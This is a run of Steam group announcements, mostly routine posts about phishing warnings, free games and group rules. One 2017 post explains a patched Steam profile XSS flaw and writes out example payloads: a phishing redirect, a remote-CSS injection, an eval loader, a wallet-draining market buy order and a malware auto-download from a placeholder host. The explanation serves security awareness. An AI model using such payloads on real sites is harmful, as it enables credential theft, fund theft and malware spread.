Recent Spam / Phishing Links

Robot//Locke. — Thu, 05 Nov 2020 20:25:38 +0000

Hello everybody,

I am sure by now a lot of our members have seen the recent "Karambit" phishing links being pushed through the Reddit chat.

I just want to remind everybody to not click any suspicious links, not just on the Reddit group, but everywhere in particular.

The Admin team is working to maintain a clean chat, but given the abilities we have, set by Valve / Steam, it is difficult for us to actually put a stop to this.

For now all we can hope is that they give us additional permissions to control these sorts of things, but until then, DO NOT CLICKING ANY SUSPICIOUS LINKS

Thank you.

Comments Section Clean Up and New Rules

Satoru — Wed, 01 Aug 2018 19:59:28 +0000

Hello everyone,

We've been looking at better managing the Steam group here. And one thing we're concerned about is the spam-like nature of the comments section.

In order to address this we will be doing a few things:

A purge of all existing comments.
Implementing new rules for the comments section.

The comments section has primarily been used for a "looking for friends" or "look at my artwork". In order to clean up the comments section we will be creating new threads for this purpose.

If you are looking for friends please post here:

https://steamcommunity.com/groups/reddit/discussions/0/1742216483309707144/

If you have some cool artwork you want to show off please post here

https://steamcommunity.com/groups/reddit/discussions/0/1742216483309727014/

Note that in these new threads we will be implementing a strict set of rules that users must follow to post. Please ensure you read those in the thread before posting.

Thanks!

Represent the Reddit group during the Sale on the Saliens Minigame!

Axanery — Thu, 21 Jun 2018 17:46:17 +0000

The Saliens minigame allows people to work to enter giveaways for awesome games and to customize your own character. There are also free cards! Pick the Reddit group on your character's flag to represent the group!

Happy New Year!

Creekie — Sun, 31 Dec 2017 22:00:23 +0000

Happy New Year for whenever it might be for you!

- /r/Steam Moderators & Reddit Steam group admins.

Sanctum 2 Free over at Humble Bundle

-Torm3nT — Thu, 23 Nov 2017 18:38:57 +0000

Sanctum 2 is a great co-op tower defense game.

Get it free HERE[www.humblebundle.com]

-Torm3nT

[expired] OUTLAST DELUXE EDITION is free from Humble Bundle for the next 23 hours

Toderico — Fri, 22 Sep 2017 17:56:46 +0000

Here[www.humblebundle.com]

Includes Outlast + Outlast Whistleblower.

A Humble Bundle account is required.

[expired] The Walking Dead season 1 is free from Humble Bundle for the next two days

Shabazingzang — Thu, 07 Sep 2017 18:52:34 +0000

Clicky [www.humblebundle.com]

A Humble Bundle account is required.

Geek Con 2018 Hosted by Geekology Events - Kettering & Cambridge United Kingdom

-Torm3nT — Wed, 06 Sep 2017 14:04:46 +0000

Just a little Annoucement about a new Con to go and see, just get the word out, hopefully it will be a major player in years to come.

Geek Con now is going for its 2nd year with Kettering & Cambridge with guest signings, stalls, gaming, competitions and more.

Current Guest list includes:
Dante Basco - Hook
Mike Carter - Star Wars
Alycia Purrott - Power Rangers SPD
Chris Violette - Power Rangers SPD
Gareth David Lloyd - Torchwood
Erica Cerra - The 100
James Crossley - Gladiators

and there may be more later on.

Geekology Events Facebook Page[www.facebook.com]

So go and support your local con we need more of them around.

-Torm3nT

Hope You're all having a Great Summer!

-Torm3nT — Tue, 20 Jun 2017 19:22:25 +0000

Smile

-Torm3nT

The Steam Community Exploit explained.

-Torm3nT — Wed, 08 Feb 2017 12:09:43 +0000

As you're likely aware, yesterday an exploit spread rapidly through the Steam Community in the form of "How to get music on your profile". This exploit was not necessarily a new discovery, but it was a dangerous one.

This exploit had the potential to perform actions as you, or a number of any other creative malicious uses. For example, this exploit could be used to make market purchases without your knowledge, using your Steam funds, or it could silently redirect you to a phishing page without you doing anything but look at a Steam profile or your Activity Feed.

I'd like to explain a bit better what this exploit is, and how it works.

The Opening

When you're developing a website that stores any information provided by the users, it goes into a database. Basic security demands that you NEVER trust the user's provided data, it should be filtered into a safe format before it ever hits the database, protecting from code injection, XSS (Cross-Site Scripting), and other nasties.

What happened here is that Steam Guide titles were stored exactly as they were entered in, and then when you displayed these guides in your "My Showcase" on your profile, it would be included exactly as you wrote it originally, directly into the page's markup.

The titles have a 128 character long limit, but you could also have 4 guides displayed at any time. Using this 128 character limit you could tell a browser to evaluate the text somewhere else as if it was JavaScript code and thus bypass this limit.

Because the Steam website relies significantly on JavaScript it is almost a guarantee that any user browsing the profile has it enabled, thus it could be abused reliably.

This exploit affected any browser that viewed the profile, including your Web Browser, your Steam Client, and your in-game Overlay.

What is XSS? What's code injection?

The simplest explanation for XSS, or Cross-Site Scripting, is that to be secure you should only allow scripting to be run from within your website, this way you know what is being run and where. XSS is the ability to run code in the website from outside of it, so for example running code on steamcommunity.com, but the script actually exists at http://www.dodgywebsitescript.com/badscript.js Code injection is running malicious code within the website by using exploits to insert it directly into the page.

How it was exploitable.

Depending on what you wanted to achieve with the exploit, it could be a very simple process or a bit more in-depth. This is just a few examples, it could be easily abused to distribute malware or do any number of harmless to dangerously creative things.

You needed to be Steam Level 10 to have access to the "My Guides" showcase.

Redirecting a user to a website to phish their login.

My first example was to demonstrate that it would be simple to redirect a user to a phishing website in order to gain their login credentials.

1) Create a guide, use the title: <script>window.location = "[PHISHING_SITE_URL]";</script> This will redirect the user to [PHISHING_SITE_URL] when they view your profile. 2) Have a website ready with a fake login page, users will be redirected here. 3) When a user visits your profile, it will redirect to a login. Because they were viewing a legitimate Steam page they are extremely likely to not notice the phishing attemp and input their information.

Utilizing CSS trickery to change your profile to trick users.

Say you wanted to impersonate someone to steal items, or appear as if you're a Valve employee, or a Steam Moderator? You can do so relatively simply.

1) Create a guide, use the title: <link rel="text/stylesheet" href="[YOUR_REMOTE_CSS_FILE]/>"

This will load the CSS in the URL provided, and due to cascading rules it will generally overrule anything you are attempting to change. As an example, here is what I did (Harmlessly, bear in mind this could be used to change literally anything on the page) to my profile to demonstrate: https://puu.sh/tTvMX/a1f6a9fbd4.png

Loading larger payloads

Obviously the 128*4 character limit will be a problem for larger exploits, thus you can bypass this with some trickery and have enough room to do whatever you want.

1) Create a guide with the following title: <script>$J(function(){eval($J(".showcase_notes").text());});</script> This is telling the browser to get the text content of your "Custom Text" showcase, and evaluate it as if it's proper JavaScript. This showcase has a massive character limit, permitting free reign.

Silently draining your Steam Wallet funds.

Because you're already logged in, this exploit could be used to perform actions AS YOU. Steam Community Market purchases do not require Steam Guard verification, so you could maliciously drain any user's funds by having them visit your page. What this code does is create a silent buy order for as many of the Anarchist trading card as possible, this card is the highest quantity and cheapest. This card is $0.08, but has such a massive quantity it will buy as many as possible until your funds are depleted.

1) Utilize the larger payload method above to have more room to write injected code. 2) In your custom info showcase use the following code: var g_Currency = 1; $.post('https://steamcommunity.com/market/createbuyorder/', {"sessionid": g_SessionID, "currency": g_Currency, "appid": 753, "market_hash_name": "730-Anarchist", "price_total": 9999, "quantity": 99999}, function(json) {});

Spreading Malware via an auto-download

A simple vector for spreading malware would be to have some aptly named malware, like "SteamGuard-Desktop.msi" download using either HTML5's download attribute on a link, and click the link with javascript, or to handle it all in javascript like:

$('<form></form>').attr('action', "maliciouswebsite.com/SteamGuard-Desktop.msi").appendTo('body').submit().remove();
This will automatically download the linked file but still requires user action. One could easily have a Steam Guard dialog appear over the profile that explains this new Desktop version, enticing a user to open it. The user has never left the Steam website, thus they would heavily be inclined to open the malware.

How this was fixed, and what should have been done to avoid it.

Because the opening was guide titles, it was a very simple fix: Stop guide titles being inserted as-is from what the original user created. When creating HTML markup you use <> to denote what an element is, but if you want those symbols as just text then you change them to their HTML Entity values, so < becomes < and > becomes >, in PHP for example it's as simple as htmlencode($title);. If this was done from the start, the exploit wouldn't have existed. People make mistakes, and those at Valve are still people who are not infallible - This goes to show how such a relatively small overlook can have massive repercussions. NEVER TRUST USER-PROVIDED DATA

Am I infected?

In truth, it is incredibly unlikely with the window of it becoming popular being quite small before Valve patched it up. This doesn't mean it's impossible. If you've lost Steam Wallet funds unexpectedly, view your market transaction history and this will show any transactions that may have occurred using this exploit, and if you do find them contact Steam Support. If you're concerned you have been infected with malware via this exploit you should run scans with your Antivirus of choice and Malwarebytes, as well as changing your password via a different machine.

https://www.reddit.com/r/Steam/comments/5srlwd/the_steam_community_exploit_explained_indepth_by/

-Torm3nT

Reddit RSS Feed